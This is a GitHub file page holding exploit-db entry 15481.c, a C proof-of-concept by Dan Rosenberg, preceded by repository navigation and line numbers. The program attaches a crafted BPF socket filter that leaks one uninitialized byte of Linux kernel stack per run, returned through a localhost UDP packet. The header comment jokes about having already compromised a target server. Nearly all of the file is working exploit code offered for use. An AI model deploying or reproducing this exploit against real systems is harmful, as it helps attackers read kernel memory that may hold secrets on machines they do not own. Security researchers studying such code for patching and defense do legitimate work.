forked from offensive-security/exploitdb
-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy path15481.c
More file actions
executable file
·136 lines (102 loc) · 3.54 KB
/
Copy path15481.c
File metadata and controls
executable file
·136 lines (102 loc) · 3.54 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
//Enjoy...
//
//-Dan
/*
* You've done it. After hours of gdb and caffeine, you've finally got a shell
* on your target's server. Maybe next time they will think twice about
* running MyFirstCompSciProjectFTPD on a production machine. As you take
* another sip of Mountain Dew and pick some of the cheetos out of your beard,
* you begin to plan your next move - it's time to tackle the kernel.
*
* What should be your goal? Privilege escalation? That's impossible, there's
* no such thing as a privilege escalation vulnerability on Linux. Denial of
* service? What are you, some kind of script kiddie? No, the answer is
* obvious. You must read the uninitialized bytes of the kernel stack, since
* these bytes contain all the secrets of the universe and the meaning of life.
*
* How can you accomplish this insidious feat? You immediately discard the
* notion of looking for uninitialized struct members that are copied back to
* userspace, since you clearly need something far more elite. In order to
* prove your superiority, your exploit must be as sophisticated as your taste
* in obscure electronic music. After scanning the kernel source for good
* candidates, you find your target and begin to code...
*
* by Dan Rosenberg
*
* Greets to kees, taviso, jono, spender, hawkes, and bla
*
*/
#include <string.h>
#include <stdio.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>
#include <stdlib.h>
#include <linux/filter.h>
#define PORT 37337
int transfer(int sendsock, int recvsock)
{
struct sockaddr_in addr;
char buf[512];
int len = sizeof(addr);
memset(buf, 0, sizeof(buf));
if (fork())
return recvfrom(recvsock, buf, 512, 0, (struct sockaddr *)&addr, &len);
sleep(1);
memset(&addr, 0, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_port = htons(PORT);
addr.sin_addr.s_addr = inet_addr("127.0.0.1");
sendto(sendsock, buf, 512, 0, (struct sockaddr *)&addr, len);
exit(0);
}
int main(int argc, char * argv[])
{
int sendsock, recvsock, ret;
unsigned int val;
struct sockaddr_in addr;
struct sock_fprog fprog;
struct sock_filter filters[5];
if (argc != 2) {
printf("[*] Usage: %s offset (0-63)\n", argv[0]);
return -1;
}
val = atoi(argv[1]);
if (val > 63) {
printf("[*] Invalid byte offset (must be 0-63)\n");
return -1;
}
recvsock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
sendsock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if (recvsock < 0 || sendsock < 0) {
printf("[*] Could not create sockets.\n");
return -1;
}
memset(&addr, 0, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_port = htons(PORT);
addr.sin_addr.s_addr = htonl(INADDR_ANY);
if (bind(recvsock, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
printf("[*] Could not bind socket.\n");
return -1;
}
memset(&fprog, 0, sizeof(fprog));
memset(filters, 0, sizeof(filters));
filters[0].code = BPF_LD|BPF_MEM;
filters[0].k = (val & ~0x3) / 4;
filters[1].code = BPF_ALU|BPF_AND|BPF_K;
filters[1].k = 0xff << ((val % 4) * 8);
filters[2].code = BPF_ALU|BPF_RSH|BPF_K;
filters[2].k = (val % 4) * 8;
filters[3].code = BPF_ALU|BPF_ADD|BPF_K;
filters[3].k = 256;
filters[4].code = BPF_RET|BPF_A;
fprog.len = 5;
fprog.filter = filters;
if (setsockopt(recvsock, SOL_SOCKET, SO_ATTACH_FILTER, &fprog, sizeof(fprog)) < 0) {
printf("[*] Failed to install filter.\n");
return -1;
}
ret = transfer(sendsock, recvsock);
printf("[*] Your byte: 0x%.02x\n", ret - 248);
}